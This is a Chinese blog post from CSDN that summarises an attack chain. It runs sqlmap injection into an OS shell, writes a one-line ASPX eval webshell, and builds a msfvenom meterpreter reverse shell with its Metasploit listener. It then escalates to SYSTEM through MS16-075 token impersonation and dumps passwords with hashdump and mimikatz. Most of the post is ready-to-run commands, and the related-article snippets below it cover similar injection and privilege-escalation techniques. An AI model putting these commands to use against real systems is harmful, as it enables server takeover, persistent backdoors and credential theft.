sqlmap注入及ms16-075提权总结

最新推荐文章于 2025-05-20 20:48:20 发布
最新推荐文章于 2025-05-20 20:48:20 发布
阅读量1k 收藏 2
点赞数
CC 4.0 BY-SA版权
文章标签: 操作系统 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33696106/article/details/85180850
本文介绍了使用SQLMap进行SQL注入攻击的方法,并详细记录了利用MS16-075漏洞进行权限提升的过程。从基本的SQLMap命令使用到复杂的系统命令执行,再到Metasploit框架的利用,最后通过Potato工具和Mimikatz实现提权。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

sqlmap注入及ms16-075提权总结

(1)sqlmap执行命令

sqlmap.py -r 1**.***.***.***.txt

sqlmap.py -r 1**.***.***.***.txt --is-db

sqlmap.py -r 1**.***.***.***.txt --password --batch

sqlmap.py -r 1**.***.***.***.txt --os-shell

(2)os-shell下执行命令

ipconfig

dir c:/

echo "thisis test">e:\software\AMS_NoFlow\t.txt

echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > e:\software\AMS_NoFlow\cmd.aspx

(3)msf下执行命令

生成反弹×××:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.33 LPORT=4433 -f exe -o 4433.exe

(4)msf启动及监听

msfconsole

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.1.33(实际为外网IP地址)

set LPORT 4433

exploit  

(5)ms16-075提权命令

use incognito

list_tokens -u

execute -cH -f ./potato.exe

list_tokens -u 

impersonate_token "NT AUTHORITY\\SYSTEM"

getuid

(6)获取密码

run hashdump

(7)mimikatz进行密码获取

load mimikatz

kerberos、livessp、msv、ssp、tspkg、wdigest(逐个命令测试,有的会显示明文密码)

mimikatz_command:mimikatz命令提示窗口

(8)mimikatz命令行下获取密码(未做测试)

privilege::debug

sekurlsa::logonpasswords


sqlmap(超超超详细使用教程)——实例说明最后介绍和绕过waf狗的脚本
记录并分享学习安全的知识点..
12-31 1266
一、明确使用sqlmap进行sql注入操作流程: (1)判断可注入的参数 (2)判断可以用那种SQL注入技术来注入 (3)识别出哪种数据库 (4)根据用户选择,读取哪些数据 二、目标后所接的参数说明 -u +URL -d #直连数据库,"mysql://root:root@192.168.1.1:3306/mysql" -l #从Burp代理日志文件中解析目标地址 -m #从文本文件中批量获取目标 -r #从文件中读取 HTTP 请求 --purge #清除历史缓存 --flush-sessi.
Windows--小迪--烂土豆--DLL劫持--udf
z2560088的博客
02-13 4511
针对环境 windows有两种环境,一种是web网站拿到的webshell环境,一般是低限的用户,(jsp除外,拿到webshell就是system限)另一种是本地的环境,可能是服务器为管理某项服务创建的低限用户。不同环境下的操作会有所不同。 方法 1.win溢出漏洞(如何判断类型和利用) 信息收集-补丁筛选-利用 MSF 或特定 EXP-执行-西瓜到手 Vulmap,Wes,WindowsVulnScan 对比,exp 在哪里获取? 利用wes进行补丁筛选 2.数据库 ...
SQLmap注入获取Webshell及系统限研究.pdf
06-08
SQLmap注入获取Webshell及系统限研究
Sqlmap使用及
热门推荐
qq_43757105的博客
10-16 1万+
目录 一、获取账密 ​二、Sqlmap ​ 一、获取账密 检查注入点,发现存在sql注入 --dbs 检查数据库名 --current-user 当前连接数据库的用户名 --current-db 当前连接数据库的名字 -D "数据库名" 指定目标数据库名 --tables 列出数据库中所有的表名 -T "cms_...
MS16-075 漏洞 复现过程
最新发布
浩策盾悟
05-20 1万+
MS16-075 漏洞利用 Windows 系统中 Group Policy(组策略)的升问题,攻击者可以通过 SMB 请求的方式利用此漏洞,以 SYSTEM 限执行任意代码。过程中的服务通信未进行适当的限检查。如果你有进一步的疑问,随时问我!
soap注入某sql2008服务器结合msf进行
xiaoi123的博客
06-05 3505
原文作者:陈小兵    在实际成功渗透过程中,漏洞的利用都是多个技术的融合,最新技术的实践,本次渗透利用sqlmap来确认注入点,通过sqlmap来获取webshell,结合msf来进行ms16-075,最终获取了目标服务器的系统限。本文算是漏洞利用的一个新的拓展,在常规Nday不成功的情况下,结合msf进行ms16-075成功的一个经典案例。1.1.1扫描soap注入漏洞    ...
利用sqlmap进行mysql的小方法(win与liunx通用)
weixin_33916256的博客
10-12 1026
文章作者:[email protected]文章来源:https://www.t00ls.net/thread-36196-1-1.html1.连接mysql数据打开一个交互shell:sqlmap.py -d mysql://root:[email protected]:3306/test --sql-shellselect @@version;select @@plugin_dir;d:\\wam...
牛掰!从sql注入到连接3389只需这几步
Appleteachers的博客
05-21 2292
REST 是一种现代架构风格,它定义了一种设计 Web 服务的新方法。和之前的 HTTP 以及 SOA 不同,它不是一个协议(即:一套严格的规则),而是一些关于 Web 服务应该如何相互通信的一些建议和最佳实践。按照 REST 最佳实践开发的服务被称为 “RESTful Web 服务”。 安全性是 RESTful 服务的基石。启用它的方法之一是尽可能内置用户身份验证和授机制。 在 RESTful 服务中实现用户身份验证和授的方法有很多。我们今天要讲的主要方法(或标准)有: Basic 认证 OAuth
基于windows server的简单内网渗透
weixin_55541277的博客
06-09 3078
记录简单的基于windows server搭建的内网渗透靶场
红队专题-与维持隐匿Privilege Escalation
aming小老弟
10-27 1671
限不仅能对更多文件进行增删改查的操作,方便进一步收集主机系统中的敏感信息, system限也可以取内存中的密码Hash,为进一步的渗透供更多信息。升是从初始访问限(通常是标准用户或应用程序帐户)一直升到administrator, root甚至SYSTEM访问限的艺术。常见技术或攻击手段来获得高限帐户访问限。用于检测和利用不同升技术的手动方法,但会到可以完成相同工作并节省您一些时间的自动化工具。 完美,它指向我们的有效负载。 使用net(也是默认安装的)启动此服务以获得
SQL注入GET参数注入版)
2303_76679642的博客
04-23 769
4.使用工具破解密码试试,但是我们没工具(OWASP ZAP),所以得先下载。15.开始运行run,然后将刚刚制作的shell内容复制到/home/kali"目录下的"shell.php"文件里面(没有就新建一个),另注意这个文件的后缀名要写成大写的PHP,因为小写的php会被过滤,无法上传。10.看完数据表之后,再看看表里面的字段,因为第一个数据库里面有很多表,这里就不一一展示,重点来看看第二个数据库表里面的字段:sqlmap -u "目标URL" -D "数据库名" -T "表名" -columns。
ORACLE直连数据库注入详解.pdf
07-03
ORACLE直连数据库注入详解 linux和windows系统直连oracle数据库和修复详解
sqlmap
m0_51822230的博客
05-17 4890
mysql 一.os-shell 建立os-shell前条件: ①必须要有dba限 ②secure_file_priv必须为空,不然无法写入文件 这是secure_file_priv为null的情况下 这是secure_file_priv为空的情况下 ③知道网站的绝对路径 1、首先查看当前用户限,是dba后进行os-shell建立 2、sqlmap -u “http://192.168.43.194/sqli/Less-1/?id=1” --os-shell 在这里选择网页语言,根据网页
mssql数据库
weixin_53639243的博客
04-23 660
获取数据库密码翻配置文件:conn.asp(asp站点) ,web.config(aspx站点) , db.inc暴力破解微软的SQL Server在过程中往往也会给我们很大帮助,尤其是当找到SA用户的密码时,系统限就基本到手了前是必须获取SA用户的密码(SA用户具有最高限)在连接成功后在sql命令处执行:就能成功的创建一个账户aaa并且加到管理员组:如果执行sql语句不成功,首先检查判断xp_cmdshell是否存在:返回1是存在的。
内网渗透模拟演练:使用sqlmap对内网mssql与反弹shell
zh的博客
10-24 4604
准备:假设内网有一台2003服务器(使用mssql数据库),把网页服务80端口映射到防火墙8092端口,外网一台centos用来接收反弹shell 工具:sqlmapmsf、apache sqlmap进行注入 测试页面存在注入点 使用sqlmap进行注入 sqlmap -u "http://61.136.208.30:8092/Content.aspx?ClassId=1&id=4" -p "id" --dbms "mssql" 注入成功,获取到了服务器信息
MSSQL注入的一些方法
简单的快乐
01-20 7463
MSSQL注入的一些方法
WEB安全--SQL注入--MySQL
m0_74800552的博客
03-30 1116
用户自定义函数,其为mysql的一个拓展接口,可以为mysql增添一些函数。比如mysql一些函数没有,我就使用UDF加入一些函数进去,那么我就可以在mysql中使用这个函数了。
数据库--MSSQL
qq_45936617的博客
10-11 2212
MSSQL是微软公司开发的数据库,又称为sql server数据库服务器。在基于微软开发的IIS中间件服务器开发的网站,通常使用的就是MSSQL数据库。常见的MSSQL数据库的方式有 xp_cmdshell、sp_oacrate、沙盒及JOB等,本文学习的是三种方式利用原理、利用条件以利用方法。
Windows烂土豆复现(MS16-075)
xnxqwzy的博客
02-29 1022
烂土豆(Rotten Potato) MS16-075是一个本地,只针对本地用户,不支持域用户,当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块(SMB)中存在特升漏洞。成功利用此漏洞的攻击者可以使用升的特执行任意代码。攻击者登录系统后,运行一个经特殊设计的应用程序利用此漏洞,从而控制受影响的系统。影响版本:
mysql sqlmap --sql-shell
01-19
### 使用 `sqlmap` 和 `--sql-shell` 对 MySQL 数据库执行操作 #### 准备工作 为了成功利用 `sqlmap` 进行 MySQL ,需要满足一些前条件。目标数据库账户需具备足够的限来创建和删除函数以及插入和删除...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值